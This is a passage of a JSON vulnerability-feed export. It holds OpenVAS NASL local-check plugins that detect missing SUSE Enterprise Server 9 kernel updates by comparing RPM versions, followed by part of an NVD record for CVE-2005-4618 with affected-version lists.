script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.5~7.252\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3358", "CVE-2005-3858", "CVE-2005-3623", "CVE-2005-3356", "CVE-2005-3848"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-smp\n kernel-syms\n um-host-kernel\n kernel-default\n kernel-bigsmp\n um-host-install-initrd\n kernel-source\n kernel-um\n kernel-debug\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010939 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065026", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065026", "type": "openvas", "title": "SLES9: Security update for Linux kernel", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5010939.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Linux kernel\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-smp\n kernel-syms\n um-host-kernel\n kernel-default\n kernel-bigsmp\n um-host-install-initrd\n kernel-source\n kernel-um\n kernel-debug\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010939 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65026\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3356\", \"CVE-2005-3358\", \"CVE-2005-3623\", \"CVE-2005-3848\", \"CVE-2005-3858\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"SLES9: Security update for Linux kernel\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.5~7.252\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2457", "CVE-2005-0916", "CVE-2005-1765", "CVE-2005-2459", "CVE-2005-2456", "CVE-2005-2458", "CVE-2005-2555"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-default\n kernel-syms\n kernel-source\n kernel-smp\n kernel-bigsmp\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5012519 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065553", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065553", "type": "openvas", "title": "SLES9: Security update for Linux kernel", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5012519.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Linux kernel\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-default\n kernel-syms\n kernel-source\n kernel-smp\n kernel-bigsmp\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5012519 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65553\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-2457\", \"CVE-2005-2458\", \"CVE-2005-2459\", \"CVE-2005-2555\", \"CVE-2005-0916\", \"CVE-2005-2456\", \"CVE-2005-1765\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"SLES9: Security update for Linux kernel\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.5~7.201\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:55:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2457", "CVE-2005-0916", "CVE-2005-1765", "CVE-2005-2459", "CVE-2005-2456", "CVE-2005-2458", "CVE-2005-2555"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-default\n kernel-syms\n kernel-source\n kernel-smp\n kernel-bigsmp\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5012519 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65553", "href": "http://plugins.openvas.org/nasl.php?oid=65553", "type": "openvas", "title": "SLES9: Security update for Linux kernel", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5012519.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Linux kernel\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-default\n kernel-syms\n kernel-source\n kernel-smp\n kernel-bigsmp\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5012519 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65553);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-2457\", \"CVE-2005-2458\", \"CVE-2005-2459\", \"CVE-2005-2555\", \"CVE-2005-0916\", \"CVE-2005-2456\", \"CVE-2005-1765\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"SLES9: Security update for Linux kernel\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.5~7.201\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-2872", "CVE-2005-2490", "CVE-2005-1041", "CVE-2005-3275", "CVE-2005-3110", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-2800", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-3055"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-debug\n kernel-syms\n um-host-kernel\n kernel-source\n um-host-install-initrd\n kernel-um\n kernel-bigsmp\n kernel-smp\n kernel-default\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5015723 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065407", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065407", "type": "openvas", "title": "SLES9: Security update for Linux kernel", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5015723.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Linux kernel\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-debug\n kernel-syms\n um-host-kernel\n kernel-source\n um-host-install-initrd\n kernel-um\n kernel-bigsmp\n kernel-smp\n kernel-default\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5015723 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65407\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3783\", \"CVE-2005-3784\", \"CVE-2005-2973\", \"CVE-2005-3806\", \"CVE-2005-3055\", \"CVE-2005-3180\", \"CVE-2005-3044\", \"CVE-2005-3275\", \"CVE-2005-2490\", \"CVE-2005-3110\", \"CVE-2005-1041\", \"CVE-2005-2800\", \"CVE-2005-2872\");\n script_tag(name:\"cvss_base\", value:\"6.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:C/A:C\");\n script_name(\"SLES9: Security update for Linux kernel\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.5~7.202.5\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-2872", "CVE-2005-2490", "CVE-2005-1041", "CVE-2005-3275", "CVE-2005-3110", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-2800", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-3055"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-debug\n kernel-syms\n um-host-kernel\n kernel-source\n um-host-install-initrd\n kernel-um\n kernel-bigsmp\n kernel-smp\n kernel-default\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5015723 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65407", "href": "http://plugins.openvas.org/nasl.php?oid=65407", "type": "openvas", "title": "SLES9: Security update for Linux kernel", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5015723.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Linux kernel\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-debug\n kernel-syms\n um-host-kernel\n kernel-source\n um-host-install-initrd\n kernel-um\n kernel-bigsmp\n kernel-smp\n kernel-default\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5015723 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65407);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3783\", \"CVE-2005-3784\", \"CVE-2005-2973\", \"CVE-2005-3806\", \"CVE-2005-3055\", \"CVE-2005-3180\", \"CVE-2005-3044\", \"CVE-2005-3275\", \"CVE-2005-2490\", \"CVE-2005-3110\", \"CVE-2005-1041\", \"CVE-2005-2800\", \"CVE-2005-2872\");\n script_tag(name:\"cvss_base\", value:\"6.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:C/A:C\");\n script_name(\"SLES9: Security update for Linux kernel\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.5~7.202.5\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-10-03T11:34:58", "description": "Buffer overflow in sysctl in the Linux Kernel 2.6 before 2.6.15 allows local users to corrupt user memory and possibly cause a denial of service via a long string, which causes sysctl to write a zero byte outside the buffer. NOTE: since the sysctl is called from a userland program that provides the argument, this might not be a vulnerability, unless a legitimate user-assisted or setuid scenario can be identified.", "edition": 3, "cvss3": {}, "published": "2005-12-31T05:00:00", "title": "CVE-2005-4618", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4618"], "modified": "2018-10-03T21:34:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.14.4", "cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.6.11.7", "cpe:/o:linux:linux_kernel:2.6.11.8", "cpe:/o:linux:linux_kernel:2.6.12.3", "cpe:/o:linux:linux_kernel:2.6.14.1", "cpe:/o:linux:linux_kernel:2.6.12", "cpe:/o:linux:linux_kernel:2.6.8", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.6.14", "cpe:/o:linux:linux_kernel:2.6.11.11", "cpe:/o:linux:linux_kernel:2.6.12.5", "cpe:/o:linux:linux_kernel:2.6.13", "cpe:/o:linux:linux_kernel:2.6.14.5", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.6.14.2", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:2.6.12.1", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.6.14.3", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.6.13.2", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.11.12", "cpe:/o:linux:linux_kernel:2.6.11", "cpe:/o:linux:linux_kernel:2.6.11.6", "cpe:/o:linux:linux_kernel:2.6.13.4", "cpe:/o:linux:linux_kernel:2.6.12.4", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:linux:linux_kernel:2.6.15", "cpe:/o:linux:linux_kernel:2.6_test9_cvs", "cpe:/o:linux:linux_kernel:2.6.11.5", "cpe:/o:linux:linux_kernel:2.6.12.6", "cpe:/o:linux:linux_kernel:2.6.13.1", "cpe:/o:linux:linux_kernel:2.6.12.2", "cpe:/o:linux:linux_kernel:2.6.13.3"], "id": "CVE-2005-4618", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4618", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.0:test2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6_test9_cvs:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:2.6.20:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*", 